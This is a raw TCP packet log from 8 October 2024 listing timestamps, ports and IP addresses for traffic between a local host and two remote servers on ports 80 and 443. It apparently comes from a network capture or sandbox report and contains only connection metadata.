Oct 8, 2024 20:47:30.939147949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939169884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939196110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939229012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939244986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939249992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939260006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939269066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939281940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939286947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939296961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939327955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939526081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939537048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939546108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939555883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939560890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939572096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:30.939575911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939594984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:30.939611912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.025713921 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.025782108 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.025871038 CEST	49821	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.026102066 CEST	49821	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.026141882 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.026168108 CEST	49821	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.026182890 CEST	443	49821	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.029066086 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.029112101 CEST	443	49825	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.029202938 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.029354095 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.029380083 CEST	443	49825	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.031647921 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.031667948 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.031702995 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.031729937 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.031768084 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.031862974 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.031862974 CEST	49820	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.031893015 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.031914949 CEST	443	49820	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.033962965 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.033986092 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.034115076 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.034257889 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.034284115 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.041374922 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.041435957 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.041532993 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.041584969 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.041584969 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.041626930 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.041649103 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.041671991 CEST	49822	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.041683912 CEST	443	49822	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.043308973 CEST	49827	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.043348074 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.043476105 CEST	49827	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.043589115 CEST	49827	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.043612957 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.049185991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049242973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049254894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049273014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049293995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049319029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049325943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049357891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049377918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049391985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049402952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049437046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049443960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049478054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049500942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049515009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049530983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049547911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049563885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049598932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049607038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049639940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049657106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049668074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049686909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049716949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049717903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049751043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049771070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049782991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049799919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049818993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049834013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049856901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049870014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049885988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.049906969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.049935102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050029039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050061941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050081015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050095081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050111055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050143957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050148010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050179958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050199032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050215006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050230980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050247908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050265074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050297976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050301075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050350904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050352097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050385952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050410032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050419092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050429106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050453901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050462008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050482988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050494909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050518036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050533056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050549984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050569057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050586939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050601006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050636053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050641060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050690889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050690889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050723076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050740004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050756931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050772905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050789118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050806046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050838947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050839901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050890923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050892115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050924063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050942898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050954103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.050972939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.050987005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051009893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051023960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051038980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051075935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051075935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051109076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051126003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051141977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051157951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051192045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051198006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051230907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051264048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051286936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051297903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051321030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051332951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051350117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051366091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051378965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051413059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051420927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051450014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051476002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051484108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051497936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051517010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051533937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051551104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051567078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051588058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.051600933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.051637888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161127090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161149025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161159992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161258936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161268950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161278963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161292076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161298990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161299944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161303043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161333084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161333084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161345959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161505938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161515951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161525965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161551952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161562920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161592960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161602020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161633015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161642075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161762953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161796093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161811113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161830902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161842108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161866903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161875010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161900997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161911964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161947966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.161952972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.161987066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162003040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162020922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162030935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162055969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162066936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162097931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162270069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162324905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162368059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162401915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162415981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162436008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162446022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162478924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162564993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162597895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162617922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162631989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162643909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162667036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162693024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162702084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162712097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162748098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162755013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162789106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162801027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162821054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162833929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162856102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162873983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162889957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162899971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162925005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162935972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.162960052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.162971973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163006067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163031101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163064003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163079023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163105965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163131952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163177967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163183928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163219929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163227081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163254976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163268089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163288116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163297892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163321972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163332939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163364887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163454056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163486958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163501978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163521051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163527966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163554907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163566113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163589001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163597107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163634062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163640022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163672924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163685083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163707018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163717985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163742065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163750887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163788080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163808107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163856030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163861990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163896084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.163907051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.163940907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164005995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164037943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164055109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164071083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164083958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164104939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164115906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164156914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164169073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164200068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164212942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164236069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164242983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164273024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164283037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164307117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164318085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164350986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164474010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164505959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164525986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164537907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164551973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164572954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164582968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164614916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164627075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164671898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164678097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164709091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164725065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164746046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164752960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164779902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164791107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164813995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164824009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164848089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164860010 CEST	49755	80	192.168.2.5	95.164.90.97
